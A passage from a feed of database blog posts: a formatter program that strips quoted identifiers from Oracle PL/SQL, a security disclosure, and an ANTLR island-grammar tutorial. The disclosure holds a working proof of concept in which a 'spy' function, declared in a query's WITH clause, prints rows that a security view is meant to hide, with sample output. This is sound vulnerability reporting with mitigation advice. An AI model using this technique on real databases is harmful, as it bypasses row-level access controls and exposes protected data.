-- Oups, no error, but the result is wrong (all NULLs)
-- This is why you should not let the formatter change the case of your identifiers!
select j.pair.key, j.pair.value
  from json_table('[{KEY:1, VALUE:"One"},{KEY:2, VALUE:"Two"}]',
          '$[*]' columns (pair varchar2(100) format json path '$')) j;

KEY VALUE
--- -----
(-) (-)  
(-) (-)

You can check this rule in combination with the previous rule by using a case-insensitive regular expression, which is the default.

5. Is Not Part of a Code Section for Which the Formatter Is Disabled

When you use a formatter there are some code sections where you do not want the formatter to change it. Therefore we want to honor the marker comments that disable and enable the formatter.

Here is an example:

create or replace procedure disable_enable_formatter is
   l_dummy sys.dual.dummy%type;
begin
   -- @formatter:off
   select decode(dummy, 'X', 1 
                      , 'Y', 2
                      , 'Z', 3
                           , 0) "DECODE_RESULT" /* @formatter:on */
     into "L_DUMMY"
     from "SYS"."DUAL";

   select "DUMMY" -- noformat start
     into "L_DUMMY"
     from "SYS"."DUAL" -- noformat end
    where "DUMMY" is not null;
end;
/

After calling the formatter we expect the following output (when changing identifier case to lower is enabled):

create or replace procedure disable_enable_formatter is
   l_dummy sys.dual.dummy%type;
begin
   -- @formatter:off
   select decode(dummy, 'X', 1 
                      , 'Y', 2
                      , 'Z', 3
                           , 0) "DECODE_RESULT" /* @formatter:on */
     into l_dummy
     from sys.dual;

   select dummy -- noformat start
     into "L_DUMMY"
     from "SYS"."DUAL" -- noformat end
    where dummy is not null;
end;
/

To check this we can reuse the approach for quoted identifiers in conditional compilation text.

Removing Double Quotes from Quoted Identifiers with Arbori

As mentioned at the beginning of the post, the current version of the PL/SQL & SQL Formatter Settings can safely remove double quotes from PL/SQL and SQL code.

Here are simplified formatter settings which can be imported into SQL Developer 22.2.1. The formatter with these settings only removes the double quotes from identifiers in a safe way and leaves your code “as is”. You can download these settings from this Gist.

<options>
    <adjustCaseOnly>false</adjustCaseOnly>
    <singleLineComments>oracle.dbtools.app.Format.InlineComments.CommentsUnchanged</singleLineComments>
    <maxCharLineSize>120000</maxCharLineSize>
    <idCase>oracle.dbtools.app.Format.Case.NoCaseChange</idCase>
    <kwCase>oracle.dbtools.app.Format.Case.lower</kwCase>
    <formatWhenSyntaxError>false</formatWhenSyntaxError>
</options>

Firstly, the option adjustCaseOnly ensures that the Arbori program is fully applied.

Secondly, the option singleLineComments ensures that the whitespace before  single line comments are kept “as is”.

Thirdly, the maxCharLineSize ensures that no line breaks are added. The value of 120000 seems to be ridiculous high. However I’ve seen single lines of around hundred thousand characters in the wild.

Fourthly, the option idCase ensures that the case of nonquoted identifiers is not changed. This is important for JSON dot notation.

Fifthly, the option kwCase ensures that the case of keywords is also kept “as is”.

And Finally, the option formatWhenSyntaxError ensures that the formatter does not change code that the formatter does not understand. This is important to keep Java strings intact.

The value of all other options are irrelevant for the this Arbori program.

-- --------------------------------------------------------------------------------------------------------------------
-- Minimal Arbori program (expected by the formatter, also expected: "order_by_clause___0").
-- --------------------------------------------------------------------------------------------------------------------
include "std.arbori"
dummy: :indentConditions & [node) identifier;
skipWhiteSpaceBeforeNode: runOnce -> { var doNotCallCallbackFunction;}
dontFormatNode: [node) numeric_literal | [node) path ->;

-- --------------------------------------------------------------------------------------------------------------------
-- Keep existing whitespace.
-- --------------------------------------------------------------------------------------------------------------------

keep_significant_whitespace:
    runOnce
-> {
    var LexerToken = Java.type('oracle.dbtools.parser.LexerToken');
    var tokens = LexerToken.parse(target.input, true);  // include hidden tokens
    var hiddenTokenCount = 0;
    var wsBefore = "";
    var Token = Java.type('oracle.dbtools.parser.Token');
    for (var i in tokens) {
        var type = tokens[i].type;
        if (type == Token.LINE_COMMENT || type == Token.COMMENT || type == Token.WS ||
            type == Token.MACRO_SKIP || type == Token.SQLPLUSLINECONTINUE_SKIP)
        {
            hiddenTokenCount++;
            if (type == Token.WS) {
                wsBefore += tokens[i].content;
            } else {
                wsBefore = "";
            }
        } else {
            if (i-hiddenTokenCount == 0 && hiddenTokenCount == wsBefore.length) {
                struct.putNewline(0, "");
            } else if (wsBefore != " ") {
                struct.putNewline(i-hiddenTokenCount, wsBefore);
            }
            wsBefore = "";
        }
    }
}

-- --------------------------------------------------------------------------------------------------------------------
-- Enforce nonquoted identifiers.
-- --------------------------------------------------------------------------------------------------------------------

enforce_nonquoted_identifiers:
    runOnce
-> {
    var offOnRanges = [];

    var populateOffOnRanges = function(tokens) {
        var off = -1;
        for (var i in tokens) {
            var type = tokens[i].type;
            if (type == Token.LINE_COMMENT || type == Token.COMMENT) {
                if (tokens[i].content.toLowerCase().indexOf("@formatter:off") != -1 
                    || tokens[i].content.toLowerCase().indexOf("noformat start") != -1)
                {
                    off = tokens[i].begin;
                }
                if (off != -1) {
                    if (tokens[i].content.toLowerCase().indexOf("@formatter:on") != -1
                        || tokens[i].content.toLowerCase().indexOf("noformat end") != -1)
                    {
                        offOnRanges.push([off, tokens[i].end]);
                        off = -1;
                    }
                }
            }
        }
    }

    var inOffOnRange = function(pos) {
        for (var x in offOnRanges) {
            if (pos >= offOnRanges[x][0] && pos < offOnRanges[x][1]) {
                return true;
            }
        }
        return false;
    }

    var HashSet = Java.type('java.util.HashSet');
    var Arrays = Java.type('java.util.Arrays');
    var reservedKeywords = new HashSet(Arrays.asList("ACCESS","ADD","AFTER","ALL","ALLOW","ALTER","ANALYTIC","AND",
        "ANY","ANYSCHEMA","AS","ASC","ASSOCIATE","AUDIT","AUTHID","AUTOMATIC","AUTONOMOUS_TRANSACTION","BEFORE",
        "BEGIN","BETWEEN","BULK","BY","BYTE","CANONICAL","CASE","CASE-SENSITIVE","CHAR","CHECK","CLUSTER","COLUMN",
        "COLUMN_VALUE","COMMENT","COMPOUND","COMPRESS","CONNECT","CONNECT_BY_ROOT","CONSTANT","CONSTRAINT",
        "CONSTRUCTOR","CORRUPT_XID","CORRUPT_XID_ALL","CREATE","CROSSEDITION","CURRENT","CUSTOMDATUM","CYCLE",
        "DATE","DB_ROLE_CHANGE","DECIMAL","DECLARE","DECREMENT","DEFAULT","DEFAULTS","DEFINE","DEFINER","DELETE",
        "DESC","DETERMINISTIC","DIMENSION","DISALLOW","DISASSOCIATE","DISTINCT","DROP","EACH","EDITIONING","ELSE",
        "ELSIF","END","EVALNAME","EXCEPT","EXCEPTION","EXCEPTIONS","EXCEPTION_INIT","EXCLUSIVE","EXISTS","EXTERNAL",
        "FETCH","FILE","FLOAT","FOLLOWING","FOLLOWS","FOR","FORALL","FROM","GOTO","GRANT","GROUP","HAVING","HIDE",
        "HIER_ANCESTOR","HIER_LAG","HIER_LEAD","HIER_PARENT","IDENTIFIED","IF","IGNORE","IMMEDIATE","IMMUTABLE",
        "IN","INCREMENT","INDEX","INDICATOR","INDICES","INITIAL","INITIALLY","INLINE","INSERT","INSTEAD","INTEGER",
        "INTERSECT","INTO","INVISIBLE","IS","ISOLATION","JAVA","JSON_EXISTS","JSON_TABLE","LATERAL","LEVEL","LIBRARY",
        "LIKE","LIKE2","LIKE4","LIKEC","LOCK","LOGON","LONG","MAXEXTENTS","MAXVALUE","MEASURES","MERGE","MINUS",
        "MINVALUE","MLSLABEL","MODE","MODIFY","MULTISET","MUTABLE","NAN","NAV","NCHAR_CS","NESTED_TABLE_ID","NOAUDIT",
        "NOCOMPRESS","NOCOPY","NOCYCLE","NONSCHEMA","NORELY","NOT","NOVALIDATE","NOWAIT","NULL","NUMBER","OF",
        "OFFLINE","ON","ONLINE","ONLY","OPTION","OR","ORADATA","ORDER","ORDINALITY","OVER","OVERRIDING",
        "PARALLEL_ENABLE","PARTITION","PASSING","PAST","PCTFREE","PIPELINED","PIVOT","PRAGMA","PRECEDES",
        "PRECEDING","PRESENT","PRIOR","PROCEDURE","PUBLIC","RAW","REFERENCES","REFERENCING","REJECT","RELY",
        "RENAME","REPEAT","RESOURCE","RESPECT","RESTRICT_REFERENCES","RESULT_CACHE","RETURNING","REVOKE","ROW",
        "ROWID","ROWNUM","ROWS","SELECT","SEQUENTIAL","SERIALIZABLE","SERIALLY_REUSABLE","SERVERERROR","SESSION",
        "SET","SETS","SHARE","SIBLINGS","SINGLE","SIZE","SMALLINT","SOME","SQLDATA","SQL_MACRO","STANDALONE",
        "START","SUBMULTISET","SUBPARTITION","SUCCESSFUL","SUPPRESSES_WARNING_6009","SYNONYM","SYSDATE","TABLE",
        "THE","THEN","TO","TRIGGER","UDF","UID","UNBOUNDED","UNDER","UNION","UNIQUE","UNLIMITED","UNPIVOT","UNTIL",
        "UPDATE","UPSERT","USER","USING","VALIDATE","VALUES","VARCHAR","VARCHAR2","VARRAY","VARYING","VIEW",
        "WHEN","WHENEVER","WHERE","WHILE","WINDOW","WITH","XMLATTRIBUTES","XMLEXISTS","XMLFOREST","XMLNAMESPACES",
        "XMLQUERY","XMLROOT","XMLSCHEMA","XMLSERIALIZE","XMLTABLE"));

    var isKeyword = function(token) {
        return reservedKeywords.contains(token.content.replace('"', ""));
    }

    var isUnquotingAllowed = function(token) {
        var Pattern = Java.type("java.util.regex.Pattern");
        if (!Pattern.matches('^"[A-Z][A-Z0-9_$#]*"$', token.content)) {
            return false;
        }
        if (isKeyword(token)) {
            return false;
        }
        return true;
    }

    var findAndConvertQuotedIdentifiers = function() {
        var tokens = LexerToken.parse(target.input,true);  // include hidden tokens
        populateOffOnRanges(tokens);
        var StringBuilder = Java.type('java.lang.StringBuilder');
        var newInput = new StringBuilder(target.input);
        var delpos = [];
        var conditionalBlock = false;
        for (var i in tokens) {
            var type = tokens[i].type;
            if (type == Token.MACRO_SKIP) {
                var content = tokens[i].content.toLowerCase();
                if (content.indexOf("$if ") == 0) {
                    conditionalBlock = true;
                } else if (content.indexOf("$end") == 0) {
                    conditionalBlock = false;
                }
            }
            if (type == Token.DQUOTED_STRING && isUnquotingAllowed(tokens[i]) 
                && !inOffOnRange(tokens[i].begin) && !conditionalBlock) 
            {
                delpos.push(tokens[i].begin);
                delpos.push(tokens[i].end-1);
            }
        }
        var i = delpos.length - 1;
        while (i >= 0) {
            newInput.deleteCharAt(delpos[i]);
            i--;
        }
        target.input = newInput.toString();
    }

    var updateParseTreeAndTokenList = function() {
        var Parsed = Java.type('oracle.dbtools.parser.Parsed');
        var SqlEarley = Java.type('oracle.dbtools.parser.plsql.SqlEarley')
        var defaultTokens = LexerToken.parse(target.input);
        var newTarget = new Parsed(target.input, defaultTokens, SqlEarley.getInstance(), 
            Java.to(["sql_statements"], "java.lang.String[]"));            
        target.src.clear();
        target.src.addAll(newTarget.src);
    }

    // main
    findAndConvertQuotedIdentifiers();
    updateParseTreeAndTokenList();
}

-- --------------------------------------------------------------------------------------------------------------------
-- Define identifiers (relevant for keyword case and identifier case)
-- --------------------------------------------------------------------------------------------------------------------

analytics: [identifier) identifier & [call) analytic_function & [call = [identifier;
ids: [identifier) identifier;
identifiers: ids - analytics ->;

Firstly, the lines 1 to 8 are required by the formatter. They are not interesting in this context.

Secondly, the lines 9 to 42 are the heart of a lightweight formatter. This code ensures that all whitespace between all tokens are kept. Therefore, the existing format of the code remains untouched. Read this blog post to learn how SQL Developer’s formatter works.

Thirdly, the lines  43 to 173 remove unnecessary double quotes from identifiers. We store the position of double quotes to be removed on line 147 and 148 in an array named delpos while processing all tokens from start to end. The removal of the double quotes happens on line 153 while processing delpos entries from end to start.

And finally, the lines 174-180 define an Arbori query named identifier. The formatter uses this query to divide lexer tokens of type IDENTIFIER into keywords and identifiers. This is important to ensure that the case of identifiers is left “as is” regardless of the configuration of kwCase.

Doesn’t Connor’s PL/SQL Function Do the Same?

No, when you look closely at the ddl_cleanup.sql script as of 2022-03-02, you will find out that the ddl function has the following limitations:

  • Quoted identifiers are not ignored in
    • Single and multi-line comments
    • Conditional compilation text
    • Code sections for which the formatter is disabled
  • Java Strings are treated as quoted identifiers
  • Reserved keywords are not considered
  • Nonquoted identifiers are changed to lower case, which might break code using JSON dot notation

It just shows that things become complicated when you don’t solve them in the right place. In this case dbms_metadata‘s XSLT scripts. dbms_metadata knows what’s an identifier. It can safely skip the enquoting process if the identifier is in upper case, matches the regular expression ^[A-Z][A-Z0-9_$#]*$ and the identifier is not a reserved keyword. That’s all. The logic can be implemented in a single XSL template. We API users on the other side must parse the code to somehow identify quoted identifiers and its context before we can decide how to proceed.

Formatting DDL Automatically

You can configure SQL Developer to automatically format DDL with your current formatter settings. For that you have to enable the option Autoformat Dictionary Objects SQL as in the screenshot below:

Autoformat DDL

Here’s the result for the deptsal view using the PL/SQL & SQL Formatter Settings:

Autoformat in Action

The identifiers in upper case were originally quoted identifiers. By default, we configure the formatter to keep the case of identifiers. This ensures that code using JSON dot notation is not affected by a formatting operation.

Processing Many Files

SQL Developer is not suited to format many files. However, you can use the SQLcl script or the standalone formatter to format files in a directory tree. The formatter settings (path to the .xml and .arbori file) can be passed as parameters. I recommend using the standalone formatter. It uses the up-to-date and much faster JavaScript engine from GraalVM. Furthermore, the standalone formatter also works with JDK 17, which no longer contains a JavaScript engine.

You can download the latest tvdformat.jar from here. Run java -jar tvdformat.jar to show all command line options.

Summary

If your code base contains generated code, then it probably also contains unnecessarily quoted identifiers. Especially if dbms_metadata was used to extract DDL statements. Removing these double quotes without breaking some code is not that easy. However, SQL Developer’s highly configurable formatter can do the job, even without actually formatting the code.

I hope that some of the shortcomings of dbms_metadata will be addressed in an upcoming release of the Oracle Database. Supporting nonquoted identifiers as an additional non-default option should be easy and not so risky to implement.

Anyway, instead of just detecting violations of G-2180: Never use quoted identifiers, it is a good idea to be able to correct them automatically.

Please open a GitHub issue if you encounter a bug in the formatter settings. Thank you.

The post Quoted Identifiers #JoelKallmanDay appeared first on Philipp Salvisberg's Blog.

optimizer_secure_view_merging and plsql_declarations

$
0
0

The Original Problem

A customer is currently upgrading some Oracle databases from 11.2 to 19c. One query was extremely slow on the new test system and my job was to find out why. The root cause was that the database parameter optimizer_secure_view_merging was set to a different value. In 19c true and false in 11.2. This lead to a different and in fact bad execution plan in 19c.

Now the question was, should the customer keep the default value of optimizer_secure_view_merging in 19c and rewrite the slow query or change the parameter to false as in 11.2 to get the good performance without a code change?

What About the opt_param Hint?

Actually, the first thing I tried was the opt_param('optimizer_secure_view_merging','false') hint. Unfortunately, this does not work in 19c. It’s a known bug 28504113. Fixed in 23c. However, I can’t really recommend waiting for 23c, right?

What About the merge view Privilege?

The merge any view privilege is a good option for highly privileged users and roles. But it should not be granted lightly to any ordinary role or user.

The merge view privilege can be granted per view to a user or role. This has a similar scope as a hint in the subquery of a view without having to change the code. In fact, it is an excellent option to override the optimizer_secure_view_merging setting for a view. We could grant merge view on <owner>.<view_name> to public to mimic the scope of a hint in the subquery of a view.

However, the customer uses a metadata driven approach to generate the grants for end user roles as part of the application. And it would require a change of the application to handle this exceptional case. Of course, this grant can easily be hard coded for the view in question, but this is something the customer would like to avoid.

Christian Antognini’s Recommendation

Chris explains optimizer_secure_view_merging on page 289 to 291 in Troubleshooting Oracle Performance, 2nd Edition. On page 291 he writes the following:

If you’re neither using views nor VPD for security purposes, I advise you to set the optimizer_secure_view_merging initialization parameter to FALSE.

In my case, the customer uses views and protects them with Virtual Private Database policies. According to Chris, the customer should keep the default value true for optimizer_secure_view_merging. A sound advice.

What Security Risk Are We Talking About?

Troubleshooting Oracle Performance, 2nd Edition comes with an allfiles.zip file. It contains a script optimizer_secure_view_merging.sql in the folder chapter09. Chris used this script to explain the impact of optimizer_secure_view_merging in his book. I reuse this script here with minor changes.

Let’s connect as user sys and create a database user u1 for the application data and code and a user u2 as connect user (with passwords which work in Autonomous Databases). We also disable optimizer_secure_view_merging.

create user u1 identified by "AppOwner2022"    default tablespace users quota unlimited on users;
create user u2 identified by "ConnectUser2022" default tablespace users quota unlimited on users;

grant create session, create table, create procedure, create view, create public synonym to u1;
grant create session, create procedure to u2;

alter system set optimizer_secure_view_merging=false scope=memory;

Now we connect as user u1 and create a table t with 6 rows. and a function f to filter rows in the view v.

create table t (
  id    number(10) primary key,
  class number(10),
  pad   varchar2(10)
);

execute dbms_random.seed(0)

insert into t (id, class, pad)
select rownum, mod(rownum, 3), dbms_random.string('a', 10)
  from dual
connect by level <= 6;

execute dbms_stats.gather_table_stats(user, 't')

create or replace function f(in_class in number) return number as
begin
   if in_class = 1 then
      return 1;
   else
      return 0;
   end if;
end;
/

create or replace view v as
   select *
     from t
    where f(class) = 1;

grant select on v to u2;

create or replace public synonym v for u1.v;

Let’s connect as user u2 to query the view.

select id, pad
  from v
 where id between 1 and 5;

        ID PAD       
---------- ----------
         1 DrMLTDXxxq
         4 AszBGEUGEL

Only two of five rows are returned due to the where clause in the view. So far so good.

The user u2 has the right to create own functions. And that is a security risk. Why? Because the user can write a spy function like in the next example:

create or replace function spy(
   in_id  in number,
   in_pad in varchar2
) return number as
begin
   dbms_output.put_line('id='
      || in_id
      || ' pad='
      || in_pad);
   return 1;
end;
/

set serveroutput on size unlimited
select id, pad
  from v
 where id between 1 and 5
   and spy(id, pad) = 1;

        ID PAD       
---------- ----------
         1 DrMLTDXxxq
         4 AszBGEUGEL

id=1 pad=DrMLTDXxxq
id=2 pad=XOZnqYRJwI
id=3 pad=nlGfGBTxNk
id=4 pad=AszBGEUGEL
id=5 pad=qTSRnFjRGb

Look at the server output for id 3, 4 and 5. By using the spy function in the where clause the user can get access to all rows in table t. This is only possible because

  • the database parameter optimizer_secure_view_merging is set to false,
  • the optimizer applies the spy function to an intermediate result and
  • the user u2 has the create procedure privilege.

When you call alter system set optimizer_secure_view_merging=true scope=memory; then the result of the previous query looks like this:

ID PAD       
---------- ----------
         1 DrMLTDXxxq
         4 AszBGEUGEL

id=1 pad=DrMLTDXxxq
id=4 pad=AszBGEUGEL

The spy function does not reveal protected data anymore. Thanks to optimizer_secure_view_merging=true.

The Next Problem

The customer’s connect users do not have create procedure privileges. After all, It’s a PinkDB application. Hence I could recommend to set optimizer_secure_view_merging=false, because the connect users would not be able to write their own spy functions, right?

Wrong. For two reasons.

Firstly, the user could have access to an existing function that might be misused, e.g. a logger function.

Secondly, we are on 19c. And since 12.1 we have plsql_declarations to write PL/SQL functions and procedures in the with_clause of a select statement. As a result, I can write a spy function without the create procedure privilege. For example like this:

set serveroutput on size unlimited
with
   function spy(
      in_id  in number,
      in_pad in varchar2
   ) return number as
   begin
      dbms_output.put_line('id='
         || in_id
         || ' pad='
         || in_pad);
      return 1;
   end;
select id, pad
  from v
 where id between 1 and 5
   and spy(id, pad) = 1;
/

        ID PAD       
---------- ----------
         1 DrMLTDXxxq
         4 AszBGEUGEL

id=1 pad=DrMLTDXxxq
id=2 pad=XOZnqYRJwI
id=3 pad=nlGfGBTxNk
id=4 pad=AszBGEUGEL
id=5 pad=qTSRnFjRGb

Again, look at the server output for id 3, 4 and 5. Protected data is revealed, even if the user has only the create session privilege and optimizer_secure_view_merging is set to true. IMO this is clearly a security bug.

What Database Versions Are Affected?

I assume that all Oracle Database versions from 12.1 onwards are affected. Including Autonomous Databases. I have explicitly tested the following versions:

  • OCI as of 2022-10-30:
    • Autonomous Database 21c (ATP)
    • Autonomous Database 19c (ADW, AJD)
  • On-Premises
    • Oracle Database XE 21c
    • Oracle Database Enterprise Edition 19c (19.16)

What Can We Do?

I created SR 3-31087264311 for this issue. I expect that either a workaround is provided or a bug is opened and a fix will be available soon. I’ll update this blog post accordingly.

In any case, if you have views or VPD policies for security purposes, set optimizer_secure_view_merging=true and ensure that the connect users do not have the create procedure privilege. Follow the principle of least privileges.

The post optimizer_secure_view_merging and plsql_declarations appeared first on Philipp Salvisberg's Blog.

IslandSQL Episode 1: Select Statement

$
0
0

Introduction

An island grammar focuses only on a small part of a grammar. The island represents the small, interesting part and the sea the rest. In this blog post, I explain the components of an island grammar for SQL scripts named IslandSQL. In the first iteration, we focus on the select statement. Everything else is not of interest for the time being.

Use Case

Let’s assume we want to write an extension for Visual Studio Code that can find text in select statements within SQL files of a workspace. So what is the difference to VSCode’s integrated text search? Well, the text search does not know what a select statement is. It finds occurrences of the search text in all kinds of places. In fact, identifying a select statement is not as easy as one might think.

Let’s look at an example.

/* select * from t1; */
-- select * from t2;
remark select * from t3;
prompt select * from t4;
begin
    sys.dbms_output.put_line('irrelevant: select * from t5;');
end;
/
create or replace procedure p is
begin
   $if false $then irrelevant: select * from t6; $end
   null;
end;
/

This SQL script does not contain relevant select statements. A select statement within a comment is hardly relevant. The same is true for select statements in remark and prompt commands. And I consider select statements within string literals and conditional compilation text also as irrelevant, at least in this example.

So let’s look at another example:

-- simple
select * from dept;
-- subquery_factoring_clause
with
   d as (
      select * from dept
   )
select * from d;
-- plsql_declarations
with
   function e_count (in_deptno in dept.deptno%type) return integer is
      l_count integer;
   begin
      select count(*)
        into l_count
        from emp;
      return l_count;
   end e_count;
select deptno, e_count(deptno)
  from dept
/
-- unterminated
select * from dept

This example script contains four select statements. As you can see, a select statement does not necessarily need to start with the select keyword. Furthermore a select statement can end on semicolon or slash or EOF (end-of-file). In fact, when using plsql_declarations the statement must end on a slash (or EOF).

Here’s a screenshot of the VSCode extension after searching for the regular expression .+ in the demo workspace, highlighting the third search result.

IslandSQL VSCode extension: search result

Lexer Grammar

The responsibility of the lexer is to convert a stream of characters to a stream of tokens. We use ANTLR 4 to generate our lexer with Java as the target language.

Here’s the grammar definition for our lexer.

lexer grammar IslandSqlLexer;

options {
    superClass=IslandSqlLexerBase;
    caseInsensitive = true;
}

/*----------------------------------------------------------------------------*/
// Comments and alike to be ignored
/*----------------------------------------------------------------------------*/

ML_COMMENT: '/*' .*? '*/' -> channel(HIDDEN);
SL_COMMENT: '--' .*? (EOF|SINGLE_NL) -> channel(HIDDEN);
REMARK_COMMAND:
    {isBeginOfCommand()}? 'rem' ('a' ('r' 'k'?)?)?
        (WS SQLPLUS_TEXT*)? SQLPLUS_END -> channel(HIDDEN)
;
PROMPT_COMMAND:
    {isBeginOfCommand()}? 'pro' ('m' ('p' 't'?)?)?
       (WS SQLPLUS_TEXT*)? SQLPLUS_END -> channel(HIDDEN)
;
STRING:
    'n'?
    (
          (['] .*? ['])+
        | ('q' ['] '[' .*? ']' ['])
        | ('q' ['] '(' .*? ')' ['])
        | ('q' ['] '{' .*? '}' ['])
        | ('q' ['] '<' .*? '>' ['])
        | ('q' ['] . {saveQuoteDelimiter1()}? .+? . ['] {checkQuoteDelimiter2()}?)
    ) -> channel(HIDDEN)
;
CONDITIONAL_COMPILATION_DIRECTIVE: '$if' .*? '$end' -> channel(HIDDEN);

/*----------------------------------------------------------------------------*/
// Islands of interest on DEFAULT_CHANNEL
/*----------------------------------------------------------------------------*/

PLSQL_DECLARATION:
    {isBeginOfStatement()}? 'with' WS
        ('function'|'procedure') SQL_TEXT*?  PLSQL_DECLARATION_END
;
SELECT:
    {isBeginOfStatement()}? ('with'|('(' WS?)* 'select') SQL_TEXT*? SQL_END
;

/*----------------------------------------------------------------------------*/
// Whitespace
/*----------------------------------------------------------------------------*/

WS: [ \t\r\n]+ -> channel(HIDDEN);

/*----------------------------------------------------------------------------*/
// Any other token
/*----------------------------------------------------------------------------*/

ANY_OTHER: . -> channel(HIDDEN);

/*----------------------------------------------------------------------------*/
// Fragments to name expressions and reduce code duplication
/*----------------------------------------------------------------------------*/

fragment SINGLE_NL: '\r'? '\n';
fragment CONTINUE_LINE: '-' [ \t]* SINGLE_NL;
fragment SQLPLUS_TEXT: (~[\r\n]|CONTINUE_LINE);
fragment SQL_TEXT: (ML_COMMENT|SL_COMMENT|STRING|.);
fragment SLASH_END: SINGLE_NL WS* '/' [ \t]* (EOF|SINGLE_NL);
fragment PLSQL_DECLARATION_END: ';'? [ \t]* (EOF|SLASH_END);
fragment SQL_END:
      EOF
    | (';' [ \t]* SINGLE_NL?)
    | SLASH_END
;
fragment SQLPLUS_END: EOF|SINGLE_NL;

Lexer Options

On line 3-6 we define the grammar options.

The first option defines the super class that the generated lexer class should extend from. We use this class to define semantic predicates that can be used in the lexer grammar. Semantic predicates are very powerful. However, they bind a grammar to a target language. Of course, you can implement a super class in different target languages. But would you want to do that for every supported target language?

The second option defines the grammar as case-insensitive. This simplifies the grammar. We can simply write select instead of S E L E C T where every letter is a fragment (e.g. fragment S: [sS];).

Channels

A token can be either ignored (skipped) or placed on a channel. ANTLR provides by default the following two channels:

  • DEFAULT_CHANNEL: for visible tokens that are relevant for the parser grammar
  • HIDDEN: for tokens that are not relevant for the parser grammar

We do not skip tokens in this grammar. This has the advantage that we can access hidden tokens when we need to. For example, for accessing hints or for lossless serialisation of chosen parts.

Comments and Alike

On line 8-33 we define hidden tokens using lexer rules.

The notation for the token definitions should be familiar to those with regular expression experience.
— Terence Parr, The Definitive ANTLR 4 Reference, 2nd edition, page 36

The tokens defined in this section are similar to comments and therefore should be ignored and placed on the hidden channel.

The order of the rules is important in case of conflicting definitions. The first rule wins. ML_COMMENT defines a multiline comment starting with /*  and ending with */. The rules defined afterwards cannot define tokens that are a subset of ML_COMMENT. For example,  a select statement within a ML_COMMENT is not visible for subsequent rules. This is the reason for the rules in this section. We want to hide select statements within comments and alike.

However, it is possible to define a token that contains a ML_COMMENT, e.g. in a select statement.

Islands of Interest

You find the islands of interest on line 35-45. The rule PLSQL_DECLARATION covers the select statement with a plsql_declarations clause. And the rule SELECT covers the select statement without a plsql_declarations clause. Identifying the end of the select statement is a bit tricky.

This definition works in many cases, but it will falsely match subqueries in other statements such as insert, update, delete, merge, etc. In such cases everything up to the next semicolon is considered part of the select statement. We will address this flaw in a future version of the grammar.

How do we ignore semicolons in comments and strings? By using the fragment SQL_TEXT. A SQL_TEXT is either a ML_COMMENT, a SL_COMMENT, a STRING or any other character (.). Again, the order is important. The lexer considers comments and strings as single tokens. A semicolon in comments or strings is not visible. As a result a semicolon in comments or strings will not be interpreted as the end of a select statement.

Did you wonder why I use ANTLR instead of regular expressions? Well, it’s simply not possible to write a regular expression that can match a complete select statement ending on semicolon while ignoring the semicolons in comments and strings. Simply put, ANTLR is more powerful.

These two rules produce a single token for the whole select statement. This is simple and enough for our current use case. However, in coming versions of the grammar we will rewrite this section to parse a select statement completely and address the issues with subqueries in other statements.

Whitespace

The WS rule on line 51 defines whitespace characters. They are not relevant for the parser, hence we put them on the HIDDEN channel.

Other Tokens

The ANY_OTHER rule on line 57 covers any other character. They are not relevant for the parser and we put them also on the HIDDEN channel.

Fragments

And finally, on line 59-74 we have fragments. A fragement allows to name an expression and use the fragment name instead of the expression in other fragments or rules. This makes the grammar more readable without introducing additional token types.

Parser Grammar

We use the output of the lexer – the token stream – in the parser. By default only the tokens on the DEFAULT_CHANNEL are visible in the parser grammar. This makes the grammar quite simple.

parser grammar IslandSqlParser;

options {
    tokenVocab=IslandSqlLexer;
}

/*----------------------------------------------------------------------------*/
// Start rule
/*----------------------------------------------------------------------------*/

file: selectStatement* EOF;

/*----------------------------------------------------------------------------*/
// Rules for reduced SQL grammar (islands of interest)
/*----------------------------------------------------------------------------*/

selectStatement: PLSQL_DECLARATION | SELECT;

Parser Options

On line 4 we include the token vocabulary based on the lexer grammar. The vocabulary defines integer values for each token type, e.g. PLSQL_DECLARATION=7 or SELECT=8. The token stream uses these integer values to identify token types. Integers are shorter than their string counterparts and therefore use less resources.

Start Rule

You find the start rule file on line 11. This is the entry point for the parser. The root node of the parse tree.

A file may contain an unbounded number of selectStatement rules. And a file ends on the pseudo tokenEOF (end-of-file). This way we ensure that the parser reads the complete file.

Select Statement

On line 17 the selectStatement is defined either as a PLSQL_DECLARATION or SELECT token.

That’s it. All other tokens are hidden and invisible to the parser.

Furthermore, it’s not possible to produce a parse error with this grammar. Everything that is not a selectStatement is on the hidden channel and irrelevant.

Interpreter

ANTLR is a parser generator. It takes the lexer and parser grammar as input and produces a lexer and parser in a chosen target language as output.

However, there are also ANTLR interpreters. As plugin in IDEs such as IntelliJ, as standalone application or as web application. After pasting the grammers into the UI you can play with it. Here’s a screenshot of the web variant of ANTLR lab.

What about semantic preticates? – The interpreter acts like the call returned true. As a result, for example xselect * from dual; is falsely recognized as a select statement. Nevertheless, this is usually good enough to explore most parts of an ANTLR grammar.

IslandSQL on GitHub

The source code of the IslandSQL parser is available on GitHub, licensed under the Apache License, Version 2.0.

However, you will not find any test cases in this repo. I have written 92 test cases for the initial version 0.1.0. They are stored in a private repository. I do not plan to release them. It’s a way to make an unfriendly fork harder. Not right now. But once the grammar has evolved to cover a significant subset of SQL of the relevant database management systems, the situation might be different.

IslandSQL on Maven Central

The IslandSQL parser is available on Maven Central. This makes integration into your preferred build system easy.

And using the parser is also easy. Here is an example:

import ch.islandsql.grammar.IslandSqlDocument;
import ch.islandsql.grammar.IslandSqlParser;

class Demo {
    public static void main(String[] args) {
        var doc = IslandSqlDocument.parse("""
                /* select * from t1; */
                -- select * from t2;
                rem select * from t3;
                prompt select * from t4;
                -- simple
                select * from dept;
                -- subquery_factoring_clause
                with d as (select * from dept) select * from d;
                -- other statements
                delete from t5;
                update t6 set c1 = null;
                commit;
                """);
        System.out.println(doc.getFile().getText());
        System.out.println("----------");
        doc.getFile().children.forEach(child -> System.out.print(child.getText()));
        System.out.println("\n----------");
        doc.getAllContentsOfType(IslandSqlParser.SelectStatementContext.class)
                .forEach(stmt -> System.out.print(stmt.getText()));
    }
}

The output of the main method is:

select * from dept;
with d as (select * from dept) select * from d;
<EOF>
----------
select * from dept;
with d as (select * from dept) select * from d;
<EOF>
----------
select * from dept;
with d as (select * from dept) select * from d;

IslandSQL on Visual Studio Code Marketplace

The extension for IslandSQL is available in the Visual Studio Code Marketplace. You can install it directly from any VS Code installation.

Agreed, this extension is currently of limited value. However, it was a good opportunity to learn about VSCode extension development and how to use the tooling around Microsoft’s Language Server Protocol (LSP) to integrate a grammar that is written in Java.

I am sure I can use this knowledge for other projects like utPLSQL once SQL Developer for VScode is available.

Outlook

